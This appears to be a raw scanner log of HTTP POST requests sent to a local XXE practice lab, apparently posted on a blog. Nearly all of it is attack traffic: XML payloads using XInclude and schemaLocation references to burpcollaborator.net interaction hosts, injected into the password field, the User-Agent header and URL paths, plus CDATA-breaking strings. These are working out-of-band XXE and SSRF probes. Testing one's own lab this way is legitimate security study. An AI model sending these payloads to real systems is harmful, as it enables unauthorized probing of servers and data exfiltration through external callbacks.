<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>tnk75rjrajqhelvf1f8gky59f0lv9lxdl580wp.burpcollaborator.net</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 376
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password><kkr xmlns="http://a.b/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://a.b/ http://darrsb6bx3d115izozv07ist2k8fw5k58xvsjh.burpcollaborator.net/kkr.xsd">kkr</kkr></password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 321
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password><sul xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://re95wpap1hhf5jmdsdzebww76yct0jokccz7nw.burpcollaborator.net/foo"/></sul></password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 160
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234]]>><</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: 6u1kc4q4hwxuly2s8sftrbcmmds8gy4qslfb30.burpcollaborator.net
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /wrra9unuemukiozi5icjo19cj3pydo1gpdc30s.burpcollaborator.net/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /%3cxgo%20xmlns%3d%22http%3a//a.b/%22%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xsi%3aschemaLocation%3d%22http%3a//a.b/%20http%3a//kl9y3ihi8ao8cct6z667ip30drjm7cvcj96zuo.burpcollaborator.net/xgo.xsd%22%3exgo%3c/xgo%3e/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /%3cjhx%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//nmd14lil9dpbdfu9097ajs43eukp8fwgkd73vs.burpcollaborator.net/foo%22/%3e%3c/jhx%3e/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab]]%3e%3e%3c/penlab/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/m9w0rk5kwcca0eh8n8u96rr21t7ovej673uuij.burpcollaborator.net/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/%3cwoz%20xmlns%3d%22http%3a//a.b/%22%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xsi%3aschemaLocation%3d%22http%3a//a.b/%20http%3a//fo7t6dkdb5r3f7w12192lk6vgmmha7y7m49vxk.burpcollaborator.net/woz.xsd%22%3ewoz%3c/woz%3e/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/%3czxp%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//d2grkbybp351t5azgzn0ziktuk0fo5c603nubj.burpcollaborator.net/foo%22/%3e%3c/zxp%3e/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab]]%3e%3e%3c/process2.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/g2jukeyep654t8a2g2n3zlkwun0io8c00rsei27.burpcollaborator.net HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/%3chfz%20xmlns%3d%22http%3a//a.b/%22%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xsi%3aschemaLocation%3d%22http%3a//a.b/%20http%3a//c0dqiawan230r48yeylzxhissjyem4a4yvqig65.burpcollaborator.net/hfz.xsd%22%3ehfz%3c/hfz%3e HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/%3chkp%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//w0xaiuwunm3kro8ieiljx1ics3yymoapygq3gr5.burpcollaborator.net/foo%22/%3e%3c/hkp%3e HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
======================================================
2:53:27 http://127.0.0.1:80
======================================================
POST /xxelab/penlab/process2.php]]%3e%3e%3c HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/xxelab/penlab/
Content-Type: text/plain;charset=UTF-8
Content-Length: 146
Connection: close
<?xml version="1.0" encoding="UTF-8"?><root><name>demo</name><tel>13812341234</tel><email>demo@163.com</email><password>demo1234</password></root>
======================================================
Leave a Reply